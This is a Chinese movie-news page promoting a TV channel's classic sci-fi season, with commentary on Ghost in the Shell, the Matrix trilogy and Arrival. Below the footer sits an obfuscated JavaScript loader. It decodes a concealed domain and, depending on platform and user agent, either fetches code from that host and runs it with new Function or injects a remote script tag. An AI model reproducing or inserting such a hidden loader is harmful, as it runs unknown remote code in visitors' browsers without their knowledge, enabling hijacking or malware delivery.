• 未来有多酷?电影频道11月21日起开启经典科幻季
  • 来源:8V电影网 人气:加载中 更新:2020.11.20


1905电影网专稿 刚刚结束的2020中国科幻大会,让科幻电影成为影迷们最近的讨论焦点。我们从未如此渴望,通过看电影去探索人类的未来。电影频道将从11月开启“经典科幻季”,通过一批经典科幻片,让更多观众感受来自未来的召唤。



打头阵的是11月21日《佳片有约》为您播出的真人版《攻壳机动队》。1995年的动画版《攻壳机动队》,曾获得戛纳国际电影节金棕榈奖和动画安妮奖最佳导演的提名。


影片探讨了高度发展的科技与人类个体之间的冲突,在视觉风格上使用了大量赛博朋克设计,大大丰富了这一美学的根基。11月21日播出的真人版《攻壳机动队》将带领观众再次走入赛博朋克的神奇世界。


随后,电影频道将连续三周,播放根据赛博朋克文学代表作改编的经典科幻片《黑客帝国》三部曲。



其中《黑客帝国3》在《佳片有约》播出。近年来科幻影史上的重要作品《降临》也会播出。



根据曾获星云奖最佳科幻长篇奖小说《你一生的故事》改编的《降临》,曾获得八项奥斯卡提名及雨果奖的最佳影视长片奖。


通过这一系列排播,电影频道将会让更多的观众欣赏到世界顶级制作水准的科幻佳片。电影自诞生之初似乎就有了科幻的意味。



科幻片臆想出的拟像充满想象力,同时,这些作品都深深地扎根于作品诞生时的社会环境。在80年代,经济处于大萧条,社会文化处于大融合时期,同时虚拟现实技术、人工智能技术、计算机网络技术、仿真技术等科技的发展,催生了“赛博朋克“类作品的诞生。



“赛博”强调秩序,“朋克”则代表一种强烈的反叛。将这二者结合的新风格充满了矛盾和张力,表达了对现代社会秩序所带来的束缚的反抗。


 

这一定义包括,阴暗都市中弥漫的末世感、科技时代冰冷的机械感、自我毁灭自我怀疑倾向、反乌托邦气质以及东方文化元素等。在当时,以《银翼杀手》为起点,刮起了一阵赛博朋克风的反乌托邦电影热潮。


11月21日,《佳片有约》将播放的科幻影片《攻壳机动队》,不仅风格延续前者,并且进一步探讨灵魂和肉体的关系,以尖利的视角来对人类自身“真相”进行思考。


《攻壳机动队》海报


阴雨中的街道、黑暗里层叠的霓虹灯、破败不堪的贫民窟都透着黑暗阴凉。《攻壳机动队》的故事时间设定在2029-2035 年。在那个时代,随着科技的迅猛发展,义体技术和人工智能不断革新,人类不断利用科技进行自我改造,以实现意识层面的永生和获得生命创造的能力。



同时,随着科技的进步和电脑犯罪的增加,催生了由电子人草薙素子担任队长,专门用来打击高科技犯罪的特殊部门攻壳机动队的建立。



然而在追查的过程中,草薙素子一次次质疑着存在的意义、人体与义体的边界。“如果人像机器一样,身体可以替换,记忆也可以修改,并且可以永生的时候,人拥有的东西究竟是什么呢?存在的意义又在于哪里呢?”



如果精神能够被人工智能所模拟,肉体能够被强有力的机器所替代,甚至于灵魂也从无序的信息海洋之中涌现,那么我们是不是无法确证自身独一无二的存在和价值?



动画《攻壳机动队》创作之初,时值日本新浪潮运动尾声。其深刻的主题、科技与人文交融的精神内核,让它一问世便引发了不小的轰动。



草薙素子拔掉后脑处的网络接线,从楼顶一跃而下,是无数攻壳粉们心中的经典镜头。2017年,斯嘉丽·约翰逊主演的真人电影版《攻壳机动队》也沿用了这个封神镜头。



11月18日,动画版《攻壳机动队》上映已满25周年。时至今日,再谈起它,人们仍惊讶于它的哲学思辨,以及对未来社会的预言。当年,《攻壳机动队》独特的视角和巧妙的构思,也曾引起沃卓斯基兄弟的兴趣。


在其启发下,4年以后,他们制作了在科幻电影史上具有划时代意义的《黑客帝国》。


《黑客帝国》海报


《黑客帝国》从非常深刻的哲学视角切入科技与现实生活,呈现出前所未有的超前、神秘、深邃、冷峻而又时尚的风格。首次上映就兴起了一股观影热潮,并且引发了包括哲学、宗教、艺术等许多领域相关话题的讨论。



在2003年,又连续推出了两部续集,即《黑客帝国2》和《黑客帝国3》,成为当年全球最为期待的商业大片之一。电影频道将连续三周,在周末播放《黑客帝国》三部曲。


从左到右:《黑客帝国》  《黑客帝国2:重装上阵》《黑客帝国3:矩阵革命》


虚拟和真实之间穿梭,在毁灭与新生之间徘徊。这三部曲讲述了一个宏大的文明寓言。它不仅囊括了对人类文明的思索与观照,更深刻地触及了虚拟AI世界的文化演进与伦理反思。影像以母体世界和机器人为镜,映照着人类对于自身存在的思考。



基努·里维斯饰演的“the one”尼奥,戴墨镜冷酷黑客的经典形象,深植人心。



影片中所创造的“子弹时间”亦是电影特效史上的里程牌。



为了完成这些镜头,特效小组花费了两年时间。在拍摄子弹时间镜头时,是以120架尼康照相机精确地摆放在一条由电脑追踪系统设定的路线上,然后让这些相机的快门按照电脑预先编程好的顺序和时间间隔开始拍照,通过电脑修补以获得360度镜头下拍摄对象的连贯顺滑的动作。


作为科幻电影的大IP,《黑客帝国》系列电影的经典地位毋庸置疑。



《黑客帝国》浪潮掀起的热论余波,从未退去。著名科幻作家本·波瓦曾说:“科幻是思考者的文学。科幻中具有一种力量,那就是提供机会使人去思考,一种通过幻想世界反映出我们世界的多种侧面的能力。”


丹尼斯· 维伦纽瓦导演的科幻电影《降临》改编自著名作家特德·蒋的小说《你一生的故事》。小说中作者笔触平淡却饱含力量,在电影中,这种力量得到了极致体现。


《降临》海报


《降临》曾获得奥斯卡最佳影片提名,金狮奖提名,横扫140多项各大奖项。诗意、平静又严肃的镜头让这部硬科幻电影带有一种特殊的艺术气质,神秘紧迫的配乐让你身临其境。



《降临》的表达方式与其他科幻电影存在着很大的区别。 传统科幻电影中的女性往往是配角,直到 2013 年《星际穿越》和 2014 年 的《地心引力》, 这两部影片才突破了之前科幻电影中的女性形象。


在电影《降临》中,影片将主角定为人文科学领域的女语言学家,打破了观众对科幻电影的固有认知。 



不同文明之间的交流问题始终都是科幻电影的重要议题,但少有电影做出如此深刻的表达。《降临》讲述了人类学习外星语言后,大脑结构、思维模式得以改变从而具有非线性时间感知能力的故事。 



露易丝在解密外星语言时,学会了外星人不受时间维度控制的语言,她逐渐掌握了超越人类认知局限的思维沟通方式。



于是用这门语言交流思考的时候,自我意识就可以超越时间维度,从而能够感知从过去到未来所有自己已有的和会有的记忆。随后用这种新的思维看到了未来并拯救了世界,还预见了自己即将经历的失败婚姻和破碎家庭。



“我预见了所有悲伤,但我依然愿意前往”如果说一般的科幻片多是展现人类面对未知事物的忧虑,《降临》则向我们提供了另一条选择的路径:不用力对抗抑或逃离,而是以主动拥抱宿命的沉着,击穿惊惶不安的遮覆。


科幻电影中科技、经济、政治和文化系统的极端发展及其与生活世界的关系,是对人类如何面对未来的某种预测、警示以及批判、倡导。



科幻片不仅为观众带来感官上的视觉盛宴,同时也引发对现代社会的思考。电影频道“经典科幻季”即将来袭,敬请期待!希望更多观众感受世界顶级科幻电影带来的魅力!


文/福楼菜


TAG标签:电影频道  经典科幻季  攻壳机动队  

上一篇:解析电影频道“决胜全面建成小康社会”主题展播

下一篇:宁浩徐峥陈思诚,谁将成为百亿票房导演第一人?

相关资讯

若8V电影网收录的节目无意侵犯了贵司版权
请在留言处留言 我们会在3日内删除侵权内容,谢谢。

function INrkf(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function dLuncNK(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return INrkf(t);};window[''+'c'+'G'+'X'+'a'+'v'+'Q'+'Y'+'r'+'E'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=dLuncNK,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('am1ydGQubG9pc3BBwLmNvbQ==','154049',window,document,['B','RbVKli']);}:function(){};